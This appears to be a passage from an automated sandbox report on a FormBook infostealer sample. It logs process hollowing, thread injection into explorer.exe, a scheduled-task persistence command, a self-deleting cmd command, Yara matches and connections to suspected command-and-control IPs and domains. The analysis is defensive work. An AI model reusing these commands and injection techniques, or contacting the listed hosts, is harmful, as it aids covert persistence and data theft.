          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h]15_2_04F9AA16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9AA16 mov eax, dword ptr fs:[00000030h]15_2_04F9AA16
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA8A0A mov eax, dword ptr fs:[00000030h]15_2_04FA8A0A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]15_2_04F9C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]15_2_04F9C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04F9C600 mov eax, dword ptr fs:[00000030h]15_2_04F9C600
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC8E00 mov eax, dword ptr fs:[00000030h]15_2_04FC8E00
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FD37F5 mov eax, dword ptr fs:[00000030h]15_2_04FD37F5
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05051608 mov eax, dword ptr fs:[00000030h]15_2_05051608
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FBDBE9 mov eax, dword ptr fs:[00000030h]15_2_04FBDBE9
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]15_2_04FC03E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]15_2_04FC03E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]15_2_04FC03E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]15_2_04FC03E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]15_2_04FC03E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC03E2 mov eax, dword ptr fs:[00000030h]15_2_04FC03E2
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0504FE3F mov eax, dword ptr fs:[00000030h]15_2_0504FE3F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]15_2_04FC4BAD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]15_2_04FC4BAD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC4BAD mov eax, dword ptr fs:[00000030h]15_2_04FC4BAD
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05024257 mov eax, dword ptr fs:[00000030h]15_2_05024257
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h]15_2_0504B260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_0504B260 mov eax, dword ptr fs:[00000030h]15_2_0504B260
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_05068A62 mov eax, dword ptr fs:[00000030h]15_2_05068A62
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FC2397 mov eax, dword ptr fs:[00000030h]15_2_04FC2397
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FCB390 mov eax, dword ptr fs:[00000030h]15_2_04FCB390
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA8794 mov eax, dword ptr fs:[00000030h]15_2_04FA8794
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h]15_2_04FA1B8F
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 15_2_04FA1B8F mov eax, dword ptr fs:[00000030h]15_2_04FA1B8F
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Memory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exe | Network Connect: 154.203.184.76 80
          Source: C:\Windows\explorer.exe | Domain query: www.primarewards.net
          Source: C:\Windows\explorer.exe | Domain query: www.novergi.com
          Source: C:\Windows\explorer.exe | Network Connect: 162.0.213.203 80
          Source: C:\Windows\explorer.exe | Domain query: www.realsults.com
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section loaded: unknown target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\rundll32.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread register set: target process: 3472
          Source: C:\Windows\SysWOW64\rundll32.exe | Thread register set: target process: 3472
          Queues an APC in another process (thread injection)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing technique
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Section unmapped: C:\Windows\SysWOW64\rundll32.exe base address: 13D0000
          Writes to foreign memory regions
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 680008
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\fgEePtnFJH' /XML 'C:\Users\user\AppData\Local\Temp\tmpDFE8.tmp'
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp Binary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
          Source: explorer.exe, 00000006.00000002.502352833.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000006.00000002.503872402.0000000001640000.00000002.00000001.sdmp, rundll32.exe, 0000000F.00000002.503679602.0000000003790000.00000002.00000001.sdmp Binary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe Queries volume information: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe VolumeInformation
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\gzU8odwaPalRTGB.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook
          Source: Yara match, File source: 00000005.00000002.305959053.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306550106.0000000000A70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000005.00000002.306525774.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.501334938.0000000000F60000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.504075659.0000000004D70000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 0000000F.00000002.503984351.0000000004D40000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.261576689.00000000041A4000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 5.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

